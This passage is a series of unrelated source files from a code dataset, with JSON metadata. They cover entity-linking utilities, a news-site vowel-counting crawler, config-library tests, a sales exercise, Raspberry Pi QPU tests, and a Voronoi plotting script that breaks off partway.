to prevent circular imports!\ndef np_to_tensor(a):\n if isinstance(a, np.ndarray):\n return 
torch.from_numpy(a)\n else:\n return a\n\nuse_cuda = torch.cuda.is_available()\nRE_WS_PRE_PUCT = re.compile(u'\\s+([^a-zA-Z\\d])')\nRE_WIKI_ENT = re.compile(r'.*wiki\\/(.*)')\nRE_WS = re.compile('\\s+')\n\nlogger = logging.getLogger(__name__)\n\n\ndef gen_wrapper(gen):\n while True:\n try:\n yield next(gen)\n except StopIteration:\n raise\n except Exception as e:\n print(e)\n pass\n\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\ndef relu(x):\n x_c = x.copy()\n x_c[x_c < 0] = 0\n return x_c\n\n\ndef PCA(x, k=2):\n x_mean = np.mean(x,0)\n x = x - x_mean\n u, s, v = np.linalg.svd(x.T)\n\n return x @ u[:, :k]\n\n\ndef normal_initialize(dim_0=1000, dim_1=16):\n \"\"\"Initialize with normal distribution of std = 1 / sqrt(dim_1). Set O index to all zeros.\"\"\"\n stdv = 1 / np.sqrt(dim_1)\n embs = np.random.normal(0, scale=stdv, size=(dim_0, dim_1))\n embs[0] = 0\n\n return embs\n\n\ndef normalize(v):\n if len(v.shape) == 1:\n return v / (np.linalg.norm(v) + 10**-11)\n elif len(v.shape) == 2:\n norm = np.linalg.norm(v, axis=1) + 10**-11\n return v / norm[:, None]\n else:\n print(\"normalize only accepts arrays of dimensions 1 or 2.\")\n sys.exit(1)\n\n\ndef list_line_locations(filename):\n line_offset = []\n offset = 0\n with open(filename, \"rb\") as f:\n for line in f:\n line_offset.append(offset)\n offset += len(line)\n return line_offset\n\n\ndef reverse_dict(d):\n\n return {v: k for k, v in d.items()}\n\n\ndef normalise_form(sf):\n sf = sf.lower()\n sf = RE_WS_PRE_PUCT.sub(r'\\1', sf)\n sf = RE_WS.sub(' ', sf)\n return sf\n\n\ndef iter_derived_forms(sf):\n yield sf\n yield sf.replace(\"'s\", \"\")\n yield ''.join(c for c in sf if not c in string.punctuation)\n\n if sf.startswith('The') or sf.startswith('the'):\n yield sf[4:]\n\n comma_parts = sf.split(',')[:-1]\n for i in range(len(comma_parts)):\n yield ''.join(comma_parts[:i + 1])\n if comma_parts:\n yield ''.join(comma_parts)\n\n colon_idx = sf.find(':')\n if colon_idx != -1:\n yield sf[:colon_idx]\n\n\ndef get_normalised_forms(sf):\n return set(normalise_form(f) for f in iter_derived_forms(sf))\n\n\ndef equalize_len(data, max_size, pad=0):\n d = data.copy()\n l = len(d)\n\n if l >= max_size:\n return d[:max_size]\n else:\n for _ in range(max_size - l):\n d.append(pad)\n\n return d\n\n\ndef equalize_len_w_eot(data, max_size, eot=None):\n l = len(data)\n arr = np.zeros(max_size, dtype=np.int64)\n\n if l >= max_size:\n arr[:max_size] = data[:max_size]\n arr[max_size - 1] = eot\n else:\n arr[:l] = data\n arr[l] = eot\n\n return arr\n\n\ndef str2bool(v):\n \"\"\"\n thanks : https://stackoverflow.com/questions/15008758/parsing-boolean-values-with-argparse\n \"\"\"\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n\n\ndef load_file_stores(data_path):\n dict_names = ['ent_dict', 'word_dict', 'redirects', 'str_prior', 'str_cond', 'disamb', 'str_necounts']\n file_stores = {}\n for dict_name in dict_names:\n file_stores[dict_name] = FileObjectStore(join(data_path, f'mmaps/{dict_name}'))\n\n return file_stores\n\n\ndef send_to_cuda(device, model):\n if isinstance(device, tuple):\n model = DataParallel(model, device)\n model = model.to(device[0])\n else:\n model = model.cuda(device)\n\n return model\n\n\ndef get_absolute_pos(word_sequences):\n batch = np.zeros_like(word_sequences, dtype=np.int64)\n for i, word_seq in enumerate(word_sequences):\n start_idx = 1\n for j, pos in enumerate(word_seq):\n if int(pos) == 0:\n batch[i, j] = 0\n else:\n batch[i, j] = 
start_idx\n start_idx += 1\n return torch.from_numpy(batch)\n\n\ndef probe(d, n=10):\n\n for i, (k, v) in enumerate(d.items()):\n if i == n:\n break\n print(k, v)\n\n\ndef check_errors(I, gold, gram_indices, rev_ent_dict, rev_gram_dict, redirects, ks):\n errors = defaultdict(list)\n\n for j, k in enumerate(ks):\n for i in range(I.shape[0]):\n if gold[i] not in I[i, :k]:\n errors[k].append((i, gold[i], I[i]))\n\n for k, errors in errors.items():\n print(\"Top {} errors:\".format(k))\n mask = random.sample(range(len(errors)), 10)\n for i in mask:\n mention_idx, gold_id, predictions_id = errors[i]\n mention_tokens = gram_indices[mention_idx]\n predictions = ','.join([rev_ent_dict.get(ent_id, '') for ent_id in predictions_id][:10])\n\n mention_grams = []\n for token_idx, token in enumerate(mention_tokens):\n if token == 0:\n break\n elif token in rev_gram_dict:\n mention_grams.append(rev_gram_dict[token][0])\n mention = ''.join(mention_grams)\n if token_idx > 0:\n last_gram = rev_gram_dict.get(mention_tokens[token_idx-1], '')\n if len(last_gram) > 1:\n mention += last_gram[1:]\n\n print('{}|{}|{}'.format(mention, rev_ent_dict.get(gold_id, ''), predictions))\n print()\n\n\ndef eval_ranking(I, gold, ks):\n out = {k: 0 for k in ks}\n\n for k in ks:\n for i in range(I.shape[0]):\n if gold[i] in I[i, :k]:\n out[k] += 1\n\n out = {k: v / I.shape[0] for k, v in out.items()}\n\n # Mean Reciprocal Rank\n ranks = []\n for i in range(I.shape[0]):\n index = np.where(gold[i] == I[i])[0] + 1\n if not index:\n ranks.append(1 / I.shape[1])\n else:\n ranks.append(1 / index)\n mrr = np.mean(np.array(ranks))\n\n if not isinstance(mrr, float):\n mrr = mrr[0]\n\n out['mrr'] = mrr\n\n return out\n\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\ndef create_arr(strs, max_char, char_dict, ent2id=None):\n dim_0 = len(strs) + 1 if ent2id else len(strs)\n arr = np.zeros((dim_0, max_char), dtype=np.int64)\n\n for i, s in enumerate(strs):\n char_ids = [char_dict[char] for char in list(s.replace('_', ' '))]\n index = ent2id.get(s, 0) if ent2id else i\n arr[index] = equalize_len_w_eot(char_ids, max_char, char_dict['EOT'])\n\n return arr\n\n\ndef decode(arr, char_dict):\n s = ''\n for c_id in arr:\n if c_id:\n s += char_dict[int(c_id)]\n return s\n\n\ndef mse(input, target):\n b = input.shape[0]\n\n return ((input - target) * (input - target)).sum() / b\n\n\ndef get_context_embs(data_path=None, emb_option=None, yamada_model=None, ent_emb_init=None):\n\n num_word, word_dim = yamada_model['word_emb'].shape\n num_ent, ent_dim = yamada_model['ent_emb'].shape\n\n if emb_option == 'random':\n logger.info(f\"Initializing context embs randomly.....\")\n word_embs = normal_initialize(num_word, word_dim)\n ent_embs = normal_initialize(num_ent, ent_dim)\n W = normal_initialize(word_dim, ent_dim)\n b = np.random.randn(ent_dim)\n elif 'w2v' in emb_option:\n logger.info(f\"Loading context embs from {emb_option}.....\")\n ent_embs, word_embs = load_gensim(data_path, model_dir=emb_option, yamada_model=yamada_model)\n W = normal_initialize(word_dim, ent_dim)\n b = np.random.randn(ent_dim)\n elif emb_option == 'yamada':\n logger.info(\"Loading context embs from yamada model.....\")\n ent_embs = yamada_model['ent_emb']\n word_embs = yamada_model['word_emb']\n W = yamada_model['W']\n b = yamada_model['b']\n elif emb_option.endswith('ckpt'):\n logger.info(f\"Loading context embs from ckpt {emb_option}.\")\n state_dict = torch.load(emb_option, 
map_location=torch.device('cpu'))['state_dict']\n ent_embs = state_dict['ent_embs.weight'].cpu().numpy()\n word_embs = state_dict['word_embs.weight'].cpu().numpy()\n W = state_dict['combine_linear.weight'].cpu().numpy()\n b = state_dict['combine_linear.bias'].cpu().numpy()\n else:\n logger.error(f'init_emb {emb_option} option not recognized, exiting....')\n sys.exit(1)\n\n word_embs[0] = 0\n ent_embs[0] = 0\n\n return word_embs, ent_embs, W, b\n\n\ndef get_mention_embs( emb_option=None, num_word=None, num_ent=None, mention_word_dim=None, mention_ent_dim=None):\n\n if emb_option.endswith('ckpt'):\n logger.info(f\"Loading mention embs from {emb_option}.....\")\n state_dict = torch.load(emb_option, map_location=torch.device('cpu'))['state_dict']\n mention_word_embs = state_dict['mention_word_embs.weight']\n mention_ent_embs = state_dict['mention_ent_embs.weight']\n elif emb_option == 'random':\n mention_word_embs = normal_initialize(num_word, mention_word_dim)\n mention_ent_embs = normal_initialize(num_ent, mention_ent_dim)\n else:\n logger.error(f'init_emb {emb_option} option not recognized, exiting....')\n sys.exit(1)\n\n mention_word_embs[0] = 0\n mention_ent_embs[0] = 0\n\n return mention_word_embs, mention_ent_embs\n\n\ndef load_vocab(vocab_path, max_vocab=-1, plus_one=False):\n d = {}\n with open(vocab_path, 'r') as f:\n for i, line in enumerate(f):\n if i == max_vocab:\n break\n key, id = line.rstrip().split('\\t')\n value = int(id) if int(id) > 0 else -int(id)\n if plus_one:\n value += 1\n d[key] = value\n return d\n\n\ndef pickle_load(path):\n assert os.path.exists(path)\n\n with open(path, 'rb') as f:\n data = pickle.load(f)\n\n return data\n\n\ndef json_load(path):\n assert os.path.exists(path)\n\n with open(path, 'r') as f:\n data = json.load(f)\n\n return data\n\n\ndef pickle_dump(o, path):\n\n with open(path, 'wb') as f:\n pickle.dump(o, f)\n\n\ndef save_checkpoint(state, filename='checkpoint.pth.tar'):\n torch.save(state, filename)\n\n\ndef conll_to_wiki(data, rev_word_dict):\n \"\"\"Converts conll data from pershina examples to wikipedia training files to work in combined dataloader.\"\"\"\n res = []\n for words, conll_examples in data:\n word_ids = [rev_word_dict.get(word) for word in words if word in rev_word_dict]\n wiki_examples = [(mention, cands[0]) for mention, cands in conll_examples]\n res.append((word_ids, wiki_examples))\n return res\n\n\ndef load_yamada(path):\n \"\"\"Loads yamada model from ntee and returns dictionary of W, word_embs, ent_embs,\n word_dict, end_dict, W and b\"\"\"\n\n with open(path, 'rb') as f:\n model_dict = pickle.load(f, encoding='bytes')\n\n orig_word_emb = model_dict[b'word_emb']\n num_words, word_dim = orig_word_emb.shape\n orig_word_emb = np.concatenate((np.zeros((1, word_dim)), orig_word_emb), axis=0).astype(np.float32)\n\n orig_ent_emb = model_dict[b'ent_emb']\n orig_ent_emb = np.concatenate((np.zeros((1, word_dim)), orig_ent_emb), axis=0).astype(np.float32)\n orig_ent_emb = normalize(orig_ent_emb)\n\n orig_word_trie = model_dict[b'word_dict']\n orig_ent_trie = model_dict[b'ent_dict']\n orig_b = model_dict[b'b']\n orig_W = model_dict[b'W']\n\n orig_ent_dict = {}\n orig_ent_keys = orig_ent_trie.keys()\n\n for i, k in enumerate(orig_ent_keys):\n k_id = orig_ent_trie.key_id(k)\n k_id += 1\n k = k.replace(' ', '_')\n orig_ent_dict[k] = k_id\n\n orig_word_dict = {}\n orig_word_keys = orig_word_trie.keys()\n\n for i, k in enumerate(orig_word_keys):\n k_id = orig_word_trie.key_id(k)\n k_id += 1\n orig_word_dict[k] = k_id\n\n return 
{'word_dict': orig_word_dict,\n 'ent_dict': orig_ent_dict,\n 'word_emb': orig_word_emb,\n 'ent_emb': orig_ent_emb,\n 'W': orig_W,\n 'b': orig_b}\n\n\ndef load_stats(args, yamada_model):\n priors = pickle_load(join(args.data_path, \"yamada\", \"ent_priors.pickle\"))\n conditionals = pickle_load(join(args.data_path, \"yamada\", \"ent_conditionals.pickle\"))\n ent2index = pickle_load(join(args.data_path, \"yamada\", \"yamada_ent2index.pickle\"))\n index2ent = reverse_dict(ent2index)\n ent_dict = yamada_model['ent_dict']\n ent_rev = reverse_dict(ent_dict)\n\n ent_priors = {}\n for ent_index, p in priors.items():\n ent_str = index2ent[ent_index]\n if ent_str in ent_dict:\n ent_id = ent_dict[ent_str]\n ent_priors[ent_id] = p\n\n ent_conditionals = {}\n for mention, cond_dict in conditionals.items():\n orig_cond_dict = {}\n for ent_id, p_m in cond_dict.items():\n if ent_id in ent_rev:\n ent_str = ent_rev[ent_id]\n if ent_str in ent_dict:\n orig_ent_id = ent_dict[ent_str]\n orig_cond_dict[orig_ent_id] = p_m\n if len(orig_cond_dict) > 0:\n ent_conditionals[mention] = orig_cond_dict\n\n return priors, conditionals\n\n\ndef load_data(data_type, train_size, data_path, coref=False):\n \"\"\"\n Load train data in format used by combined and yamada dataloader.\n \"\"\"\n res = {}\n splits = ['train', 'dev', 'test']\n if data_type == 'proto':\n logger.info(\"Loading Wikipedia proto training data.....\")\n for split in ['train', 'dev']:\n id2context, examples = pickle_load(join(data_path, 'training_files', 'proto', f'{split}.pickle'))\n if split == 'train':\n examples = examples[:train_size]\n res[split] = id2context, examples\n\n res['test'] = {}, []\n\n elif data_type == 'full':\n logger.info(\"Loading Wikipedia orig training data.....\")\n id2context, examples = pickle_load(join(data_path, 'training_files', 'full', 'full.pickle'))\n\n train_data = []\n dev_data = []\n test_data = []\n for ex in examples:\n if len(train_data) == train_size:\n break\n r = np.random.random()\n if r < 0.90:\n train_data.append(ex)\n\n elif 0.9 < r < 0.95:\n dev_data.append(ex)\n else:\n test_data.append(ex)\n\n res = {'train': (id2context, train_data),\n 'dev': (id2context, dev_data),\n 'test': (id2context, test_data)\n }\n elif data_type == 'conll':\n if coref:\n logger.info(\"Loading conll data from trainning_files/coref....\")\n res['dev'] = pickle_load(join(data_path, 'training_files', 'coref', 'conll-dev.pickle'))\n res['train'] = pickle_load(join(data_path, 'training_files', 'coref', 'conll-train.pickle'))\n res['test'] = []\n else:\n data_dict = pickle_load(join(data_path, 'training_files', f'all_conll.pickle'))\n for split in splits:\n res[split] = data_dict['id2c'], data_dict['data'][split]\n else:\n logger.error(\"Data type {} not recognized\".format(data_type))\n sys.exit(1)\n\n return res\n\n\ndef load_gensim(data_path=None, model_dir=None, yamada_model=None):\n \"\"\"Load model trained with gensim, fill in the ent and word vector matrix and return them.\"\"\"\n word2id = yamada_model['word_dict']\n ent2id = yamada_model['ent_dict']\n\n model = gensim.models.KeyedVectors.load(join(data_path, 'w2v', model_dir, 'model'))\n wv = model.wv\n index2word = wv.index2word\n vectors = wv.vectors\n emb_dim = vectors.shape[1]\n\n ent_indices = [i for i, word in enumerate(index2word) if word.startswith('e__')]\n ent_ids = [int(word[3:]) for i, word in enumerate(index2word) if word.startswith('e__')]\n\n word_indices = [i for i, word in enumerate(index2word) if not word.startswith('e__')]\n words = [word for i, word in 
enumerate(index2word) if not word.startswith('e__')]\n\n ent_embs = np.zeros((len(ent2id) + 1, emb_dim))\n for ent_index, ent_id in zip(ent_indices, ent_ids):\n ent_embs[ent_id] = vectors[ent_index]\n\n word_embs = np.zeros((len(word2id) + 1, emb_dim))\n for word_index, word in zip(word_indices, words):\n if word in word2id:\n word_id = word2id[word]\n word_embs[word_id] = vectors[word_index]\n\n return ent_embs, word_embs\n","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"552390653","text":"#!/usr/bin/env python3\n\nimport sys\nimport signal\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nfrom collections import OrderedDict\nimport datetime\nimport os\nimport sqlite3 as lite\n\nfrom bottle import run\nimport bonus\n\n\nDB = bonus.DB\nvowels = \"aàeèéiíïoòóuúü\" # Catalan vowels (w/ accentuation)\n\n\nclass AraSpider(scrapy.Spider):\n '''\n Class scrapy for task crawler. Scratch all news URL and count\n the number of vowels for each article.\n '''\n name = 'ara'\n allowed_domains = [\"ara.cat\"]\n start_urls = ['http://www.ara.cat/rss/']\n\n def __init__(self, data={}, *args, **kwargs):\n super(AraSpider, self).__init__(*args, **kwargs)\n self.data = data\n\n def parse(self, response):\n for href in response.xpath('//item/link/text()'):\n full_url = href.extract()\n self.data[full_url] = 0\n yield scrapy.Request(full_url, callback=self.parse_vowels)\n \n def parse_vowels(self, response): \n titular = response.css('#heading h1::text').extract()[0].lower()\n subtitular = ''.join(response.css(\n '#heading .pg-bkn-nutfold.txt ::text').extract()).strip().lower()\n body = ''.join(response.css('.mce-body .mce::text').extract()).lower()\n # body xpath('//div[@class=\"mce-body\"]//text()')\n text = ''.join((titular, subtitular, body))\n count_vowels = sum(c in vowels for c in text)\n self.data[response.url] = count_vowels\n\n\ndef persist(data, filename=DB):\n '''\n Bonus1: Persist the results in SQLite3.\n Struct of bd:\n Tablename: Data of the day (i.e., date280320016)\n Items: Id (Autoincrement)\n Web\n Vowels\n Extra: If table exist, update new news.\n '''\n\n table_name = datetime.datetime.utcnow().strftime('date%d%m%Y')\n create = not os.path.exists(filename)\n db = lite.connect(filename)\n cursor = db.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table' and \"\n \"name=?\",(table_name,))\n tables = cursor.fetchall()\n\n if create or len(tables) == 0:\n with db: \n cursor.execute(\"CREATE TABLE \" + table_name + \" (\"\n \"Id INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE NOT NULL, \"\n \"Web TEXT UNIQUE NOT NULL, \"\n \"Vowels INTEGER NOT NULL)\")\n cursor.executemany(\"INSERT INTO \" + table_name + \"(Web,Vowels)\"\n \" VALUES(?, ?)\", data.items())\n return \"Persisted\"\n else:\n with db:\n cursor.executemany(\"INSERT OR IGNORE INTO \" + table_name +\n \"(Web,Vowels) VALUES(?, ?)\", data.items())\n return \"Updated\"\n \n \nif __name__ == \"__main__\":\n \n data = OrderedDict()\n\n # Create and run the crawler object\n process = CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',\n 'LOG_ENABLED': False,\n 'COOKIES_ENABLED': False,\n })\n process.crawl(AraSpider, data=data)\n process.start()\n\n # Show each resource (key : value) representation\n for k, v in data.items():\n print('{0} : {1}'.format(k, v))\n\n # Bonus1, persist the results in SQLite\n print(\"Data {0} : 
OK\".format(persist(data)))\n\n # Bonus1/Bonus3 run ReST API server with signal for Ctrl-C\n def signal_handler(signal, frame):\n sys.exit(0)\n\n signal.signal(signal.SIGINT, signal_handler)\n run(host='localhost', port=8080)\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469465194","text":"#\n# Copyright (C) 2012 - 2021 Satoru SATOH \n# SPDX-License-Identifier: MIT\n#\n# pylint: disable=missing-docstring\nimport copy\nimport pathlib\nimport tempfile\nimport unittest\n\nimport anyconfig as TT\n\n\nclass TestCase(unittest.TestCase):\n\n obj = dict(name=\"a\", a=1, b=dict(b=[0, 1], c='C'))\n\n def test_10_dump_and_load(self):\n with tempfile.TemporaryDirectory() as tmpdir:\n obj_path = pathlib.Path(tmpdir) / 'a.json'\n\n TT.dump(self.obj, obj_path)\n self.assertTrue(obj_path.exists())\n\n obj1 = TT.load(obj_path)\n self.assertEqual(self.obj, obj1)\n\n def test_20_dump_and_multi_load(self):\n obj_diff = dict(a=2, b=dict(b=[1, 2, 3, 4, 5], d='D'))\n\n with tempfile.TemporaryDirectory() as tmpdir:\n a_path = pathlib.Path(tmpdir) / 'a.json'\n b_path = pathlib.Path(tmpdir) / 'b.json'\n\n TT.dump(self.obj, a_path)\n self.assertTrue(a_path.exists())\n\n TT.dump(obj_diff, b_path)\n self.assertTrue(b_path.exists())\n\n ref = copy.copy(self.obj)\n obj_1 = TT.multi_load([a_path, b_path], ac_merge=TT.MS_DICTS)\n TT.merge(ref, obj_diff, ac_merge=TT.MS_DICTS)\n self.assertEqual(obj_1, ref)\n\n# vim:sw=4:ts=4:et:\n","sub_path":"tests/mod.py","file_name":"mod.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"278627498","text":"\n\n\n\ndef innlesing(filnavn):\n guleSider = {}\n \n with open(filnavn, \"r\") as infile:\n for line in infile.readlines():\n line = line.split()\n\n guleSider[line[0]] = int(line[1])\n\n return guleSider\n\n\ndef maanedensSalgsPerson(ob):\n print(max(ob, key=ob.get), ob[max(ob, key=ob.get)])\n\n\ndef totalAntallSalg(ob):\n counter = 0\n for i in ob:\n counter+= ob[i]\n return counter\n\n\ndef gjennomsnittSalg(ob):\n return totalAntallSalg(ob)/len(ob)\n\n\ndef hovedprogram(filnavn):\n a = innlesing(filnavn)\n print(\"Filnavnet er\", filnavn)\n print(\"Maanedens Salgs Person:\") \n maanedensSalgsPerson(a)\n print(\"Total antall salg:\", totalAntallSalg(a))\n print(\"GjennomsnittSalg: \", gjennomsnittSalg(a))\n print(\"Antall personer lest inn:\", len(a))\n\nhovedprogram(\"salgsliste.txt\")\n\n\n\n\n\n\n\n","sub_path":"oblig6/telefonsalg.py","file_name":"telefonsalg.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"512548808","text":"\nimport time\nfrom videocore6.driver import Driver\nfrom videocore6.assembler import qpu\nimport numpy as np\n\n\n@qpu\ndef cost(asm):\n shl(r0, 8, 8)\n shl(r0, r0, 8)\n with loop as l:\n sub(r0, r0, 1, cond = 'pushn')\n l.b(cond = 'anyna')\n nop()\n nop()\n nop()\n\n@qpu\ndef qpu_serial(asm):\n\n nop(sig = ldunifrf(rf0))\n nop(sig = ldunifrf(rf1))\n nop(sig = ldunifrf(rf2))\n nop(sig = ldunifrf(rf3))\n\n eidx(r0)\n shl(r0, r0, 2)\n add(rf2, rf2, r0)\n add(rf3, rf3, r0)\n shl(r3, 4, 4)\n\n for i in range(16):\n mov(tmua, rf2, sig = thrsw).add(rf2, rf2, r3)\n nop()\n nop()\n nop(sig = ldtmu(r0))\n mov(tmud, r0)\n mov(tmua, rf3, sig = thrsw).add(rf3, rf3, r3)\n tmuwt()\n\n cost(asm)\n\n nop(sig = thrsw)\n nop(sig 
= thrsw)\n nop()\n nop()\n nop(sig = thrsw)\n nop()\n nop()\n nop()\n\n# This code requires 16 thread execution.\n# If # of thread < 16, thread id (= (tidx & 0b111110) >> 1) could be discontiguous.\n# If # of thread > 16, thread id (= (tidx & 0b111110) >> 1) could be duplicated.\n@qpu\ndef qpu_parallel_16(asm):\n\n tidx(r0, sig = ldunifrf(rf0))\n shr(r0, r0, 1).mov(r1, 1)\n shl(r1, r1, 5)\n sub(r1, r1, 1)\n band(rf31, r0, r1) # rf31 = (qpu_id * 2) + (thread_id >> 1)\n\n # rf31 * unif[0,1] * sizeof(float) + (unif.addresses[0,0] + 2 * sizeof(float))\n nop(sig = ldunifrf(rf1)) # rf1 = unif[0,1]\n shl(r0, rf1, 2)\n umul24(r0, r0, rf31)\n add(r1, rf0, 8)\n add(r0, r0, r1)\n eidx(r1)\n shl(r1, r1, 2)\n add(tmua, r0, r1, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(r0)) # unif[th,2:18]\n mov(r5rep, r0)\n mov(rf2, r5).rotate(r5rep, r0, -1) # rf2 = unif[th,2]\n mov(rf3, r5) # rf3 = unif[th,3]\n\n eidx(r2)\n shl(r2, r2, 2)\n add(tmua, rf2, r2, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(rf32))\n\n eidx(r2)\n shl(r2, r2, 2)\n mov(tmud, rf32)\n add(tmua, rf3, r2)\n tmuwt()\n\n cost(asm)\n\n nop(sig = thrsw)\n nop(sig = thrsw)\n nop()\n nop()\n nop(sig = thrsw)\n nop()\n nop()\n nop()\n\ndef test_parallel_16():\n\n with Driver() as drv:\n\n thread = 16\n\n serial_code = drv.program(qpu_serial)\n parallel_code = drv.program(qpu_parallel_16)\n X = drv.alloc((thread, 16), dtype = 'float32')\n Ys = drv.alloc((thread, 16), dtype = 'float32')\n Yp = drv.alloc((thread, 16), dtype = 'float32')\n unif = drv.alloc((thread, 4), dtype = 'uint32')\n\n X[:] = np.random.randn(*X.shape)\n Ys[:] = -1\n Yp[:] = -1\n\n unif[:,0] = unif.addresses()[:,0]\n unif[:,1] = unif.shape[1]\n unif[:,2] = X.addresses()[:,0]\n unif[:,3] = Ys.addresses()[:,0]\n\n start = time.time()\n drv.execute(serial_code, unif.addresses()[0,0])\n end = time.time()\n serial_cost = end - start\n\n unif[:,3] = Yp.addresses()[:,0]\n\n start = time.time()\n drv.execute(parallel_code, unif.addresses()[0,0], thread=thread)\n end = time.time()\n parallel_cost = end - start\n\n np.set_printoptions(threshold=np.inf)\n\n assert (X == Ys).all()\n assert (X == Yp).all()\n assert parallel_cost < serial_cost * 2\n\n# If remove `barrierid` in this code, `test_barrier` will fail.\n@qpu\ndef qpu_barrier(asm):\n\n tidx(r0, sig = ldunifrf(rf0)) # rf0 = unif[0,0]\n shr(r2, r0, 2)\n band(r1, r0, 0b11) # thread_id\n band(r2, r2, 0b1111) # qpu_id\n shr(r1, r1, 1)\n shl(r2, r2, 1)\n add(rf31, r1, r2) # rf31 = (qpu_id * 2) + (thread_id >> 1)\n\n nop(sig = ldunifrf(rf1)) # rf1 = unif[0,1]\n\n # rf31 * unif[0,1] * sizeof(float) + (unif.addresses[0,0] + 2 * sizeof(float))\n shl(r0, rf1, 2)\n umul24(r0, r0, rf31)\n add(r1, rf0, 8)\n add(r0, r0, r1)\n eidx(r1)\n shl(r1, r1, 2)\n add(tmua, r0, r1, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(r0)) # unif[th,2:18]\n mov(r5rep, r0)\n mov(rf2, r5).rotate(r5rep, r0, -1) # rf2 = unif[th,2]\n mov(rf3, r5) # rf3 = unif[th,3]\n\n eidx(r2)\n shl(r2, r2, 2)\n add(tmua, rf2, r2, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(r0))\n\n mov(r1, rf31)\n shl(r1, r1, 8)\n L.loop\n sub(r1, r1, 1, cond = 'pushn')\n b(R.loop, cond = 'anyna')\n nop()\n nop()\n nop()\n\n eidx(r2)\n shl(r2, r2, 2)\n mov(tmud, r0)\n add(tmua, rf3, r2)\n tmuwt()\n\n barrierid(syncb, sig = thrsw)\n\n add(rf32, rf31, 1)\n band(rf32, rf32, 0b1111) # rf32 = (rf31 + 1) mod 16\n\n # rf32 * unif[0,1] * sizeof(float) + (unif.addresses[0,0] + 2 * sizeof(float))\n shl(r0, rf1, 2)\n umul24(r0, r0, rf32)\n add(r1, rf0, 8)\n add(r0, r0, r1)\n eidx(r1)\n shl(r1, r1, 2)\n 
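# issue the TMU read for the next thread's uniform row\n    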
add(tmua, r0, r1, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(r0)) # unif[(th+1)%16,2:18]\n mov(r5rep, r0)\n mov(rf4, r5).rotate(r5rep, r0, -1) # rf4 = unif[(th+1)%16,2]\n mov(rf5, r5) # rf5 = unif[(th+1)%16,3]\n\n eidx(r2)\n shl(r2, r2, 2)\n add(tmua, rf5, r2, sig = thrsw)\n nop()\n nop()\n nop(sig = ldtmu(r0))\n\n eidx(r2)\n shl(r2, r2, 2)\n mov(tmud, r0)\n add(tmua, rf3, r2)\n tmuwt()\n\n nop(sig = thrsw)\n nop(sig = thrsw)\n nop()\n nop()\n nop(sig = thrsw)\n nop()\n nop()\n nop()\n\ndef test_barrier():\n\n with Driver() as drv:\n\n thread = 16\n\n code = drv.program(qpu_barrier)\n X = drv.alloc((thread, 16), dtype = 'float32')\n Y = drv.alloc((thread, 16), dtype = 'float32')\n unif = drv.alloc((thread, 4), dtype = 'uint32')\n\n X[:] = np.random.randn(*X.shape)\n Y[:] = -1\n\n unif[:,0] = unif.addresses()[:,0]\n unif[:,1] = unif.shape[1]\n unif[:,2] = X.addresses()[:,0]\n unif[:,3] = Y.addresses()[:,0]\n\n start = time.time()\n drv.execute(code, unif.addresses()[0,0], thread=thread)\n end = time.time()\n\n np.set_printoptions(threshold=np.inf)\n\n assert (Y == np.concatenate([X[1:],X[:1]])).all()\n","sub_path":"tests/test_parallel.py","file_name":"test_parallel.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"204489144","text":"from numpy import *\r\nfrom matplotlib import pyplot as plt\r\nfrom delaunay_generation import main_delaunay_generation as delaunay_gen\r\nimport pickle\r\nfrom matplotlib.path import Path\r\nimport matplotlib.patches as patches\r\nfrom getcolorclass import *\r\n\r\n#####################################################################################\r\n#### delaunay structure : #################################\r\n#### delaunay.Liste #################################\r\n#### delaunay.rand_pts #################################\r\n#### #################################\r\n#### delaunay.Liste[i].indice #################################\r\n#### delaunay.Liste[i].Tri[j] #################################\r\n#### delaunay.Liste[i].Bary[j] #################################\r\n#### #################################\r\n#### delaunay.Liste[i].water #################################\r\n#### delaunay.Liste[i].moisture #################################\r\n#### delaunay.Liste[i].altitude #################################\r\n#### #################################\r\n#### delaunay.Liste[i].Bary[j].pos #################################\r\n#### delaunay.Liste[i].Bary[j].water #################################\r\n#### delaunay.Liste[i].Bary[j].altitude #################################\r\n#### delaunay.Liste[i].Bary[j].moisture #################################\r\n#### delaunay.Liste[i].Bary[j].tri #################################\r\n#####################################################################################\r\n\r\ndef main_voronoi() :\r\n\r\n size_grid = 15\r\n density = 1\r\n grid_step = 1\r\n affichage = 'Polygone'\r\n\r\n delaunay = delaunay_gen(size_grid, density, grid_step)\r\n## return delaunay\r\n\r\n ## gcfm = GetColorFromMap(size_grid)\r\n## if affichage == 'Polygone' or affichage == 'Polygone2':\r\n gcfm = GetColorFromMap(size_grid)\r\n\r\n ####plt.figure()\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n if 1 :\r\n for delau_point in delaunay.Liste :\r\n if affichage == 'Point' :\r\n print(\"point\")\r\n x = empty(0)\r\n y = empty(0)\r\n for bary in delau_point.Bary :\r\n x = 